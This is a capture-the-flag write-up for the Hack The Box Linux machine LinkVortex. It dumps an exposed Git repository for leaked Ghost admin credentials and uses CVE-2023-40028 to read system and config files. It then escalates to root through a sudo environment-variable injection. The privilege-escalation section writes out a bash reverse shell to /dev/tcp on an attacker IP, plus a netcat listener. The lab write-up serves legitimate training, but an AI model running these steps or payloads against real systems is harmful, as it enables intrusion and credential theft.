> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2024-12-14

Hack The Box — LinkVortex (Linux)

Ghost admin credential leak through exposed Git repository, arbitrary file read in Ghost 5.58.0, SSH access as bob, and root via sudo environment variable injection in clean_symlink.sh.

Target

  • IP: 10.129.231.194

Port Scan

sudo nmap -sC -sV 10.129.231.194 -p- -T5 -v

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
|_http-server-header: Apache
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add linkvortex.htb to /etc/hosts.

Go to:

http://linkvortex.htb/

We notice: Powered by Ghost.

VHost and Directory Enumeration

gobuster vhost -u 'http://linkvortex.htb/' -w /home/kali/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50 --append-domain

Found: dev.linkvortex.htb Status: 200 [Size: 2538]

Add dev.linkvortex.htb to /etc/hosts.

Go to:

http://dev.linkvortex.htb/

The page says:

Launching soon
Our website is under construction. We’ll be here soon with our new and exciting site.

gobuster dir -u 'http://dev.linkvortex.htb/' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50

/.git                 (Status: 301) [Size: 239] [--> http://dev.linkvortex.htb/.git/]

Source Code Retrieval from Exposed Git

Download git-dumper:

  • https://github.com/arthaud/git-dumper
mkdir www
python3 git-dumper/git_dumper.py http://dev.linkvortex.htb/ www

cd www
git status

        nuovo file:             Dockerfile.ghost
        modificato:             ghost/core/test/regression/api/admin/authentication.test.js

In ghost/core/test/regression/api/admin/authentication.test.js we notice:

            const email = 'test@example.com';
            const password = 'OctopiFociPilfer45';

Go to:

http://linkvortex.htb/ghost/

Login with:

  • email: admin@linkvortex.htb
  • password: OctopiFociPilfer45

Ghost Arbitrary File Read (CVE-2023-40028)

From Dockerfile.ghost, we notice Ghost version 5.58.0.

Searching vulnerabilities for this version reveals CVE-2023-40028 (arbitrary file read).

PoC:

  • https://github.com/0xyassine/CVE-2023-40028

Download:

  • https://github.com/0xyassine/CVE-2023-40028/raw/refs/heads/master/CVE-2023-40028.sh

Modify it to set:

GHOST_URL='http://linkvortex.htb'

chmod +x CVE-2023-40028.sh
./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45

WELCOME TO THE CVE-2023-40028 SHELL

Read passwd:

file> /etc/passwd

We notice user node.

Read Ghost configuration (in Dockerfile.ghost we note path /var/lib/ghost/config.production.json):

file> /var/lib/ghost/config.production.json

We notice:

      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
        }

SSH Access as bob

ssh bob@linkvortex.htb

Use the recovered password.

sudo -l

Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty,
    env_keep+=CHECK_CONTENT

User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

Read script:

cat /opt/ghost/clean_symlink.sh

#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

Privilege Escalation to Root

cd /dev/shm

Create file rev with content:

#!/bin/bash
bash -i >& /dev/tcp/10.10.16.12/4444 0>&1

Make it executable:

chmod +x rev

Start listener:

nc -vlnp 4444

On victim machine, create symlink:

ln -s /hello hello.png

Execute:

CHECK_CONTENT='/dev/shm/rev' sudo /usr/bin/bash /opt/ghost/clean_symlink.sh hello.png

We obtain a reverse shell as root.